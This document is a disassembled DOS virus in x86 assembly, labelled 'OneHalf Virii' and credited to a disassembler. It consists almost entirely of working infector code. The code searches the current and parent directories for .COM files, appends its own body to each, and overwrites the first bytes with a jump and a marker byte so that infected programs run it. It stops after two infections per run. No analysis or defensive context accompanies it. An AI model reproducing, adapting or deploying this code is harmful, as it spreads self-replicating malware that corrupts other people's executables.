OneHalf  Virii

CRF

; --------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
; --------------------------------------------------------------------------

tof:
jmp short begin
nop ;Reserve 3rd byte
EOFMARK: db 26

first_four: nop
address: int 20h
check: nop
begin: call nextline
nextline: pop bp
sub bp,offset nextline

mov byte ptr [bp+offset infected],0

lea si,[bp+offset first_four]
mov di,offset tof
mov cx,4
cld
rep movsb

mov ah,1Ah
lea dx,[bp+offset DTA]
int 21h

mov ah,4Eh
lea dx,[bp+offset filespec]
lea si,[bp+offset filename]
push dx
jmp short continue

return: mov ah,1ah
mov dx,80h
int 21h
xor ax,ax ;AX= 0
mov bx,ax ;BX= 0
mov cx,ax ;CX= 0
mov dx,ax ;DX= 0
mov si,ax ;SI= 0
mov di,ax ;DI= 0
mov sp,0FFFEh ;SP= 0
mov bp,100h
push bp
mov bp,ax
ret

nextfile: or bx,bx
jz skipclose
mov ah,3Eh
int 21h
xor bx,bx
skipclose: mov ah,4Fh

continue: pop dx
push dx
xor cx,cx
xor bx,bx
int 21h
jnc skipjmp
jmp NoneLeft

skipjmp: mov ax,3D02h
mov dx,si
int 21h
jc nextfile

mov bx,ax
mov ah,3Fh
mov cx,4
lea dx,[bp+offset first_four]
int 21h
cmp byte ptr [bp+offset check],26
je nextfile
cmp byte ptr [bp+offset first_four],77
je nextfile
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h

cmp ax,0FD00h
ja nextfile
mov [bp+offset addr],ax

mov ah,40h
mov cx,4
lea dx,[bp+offset first_four]
int 21h
mov ah,40h
mov cx,offset eof-offset begin
lea dx,[bp+offset begin]
int 21h

mov ax,4200h
xor cx,cx
xor dx,dx
int 21h

mov ax,[bp+offset addr]
inc ax

mov [bp+offset address],ax
mov byte ptr [bp+offset first_four],0E9h
mov byte ptr [bp+offset check],26

mov ah,40h
mov cx,4
lea dx,[bp+offset first_four]
int 21h

inc byte ptr [bp+offset infected]
jmp nextfile

NoneLeft: cmp byte ptr [bp+offset infected],2
jae TheEnd ;The party's over!

mov di,100h ;DI= 100h
cmp word ptr [di],20CDh
je TheEnd

lea dx,[bp+offset prevdir]
mov ah,3Bh
int 21h
jc TheEnd
mov ah,4Eh
jmp continue

TheEnd: jmp return

filespec: db '*.COM',0
prevdir: db '..',0

eof:
DTA: db 21 dup (?)

attribute db ?
file_time db 2 dup (?)
file_date db 2 dup (?)
file_size db 4 dup (?)
filename db 13 dup (?)

infected db ?

addr dw ?

main endp
code ends

end main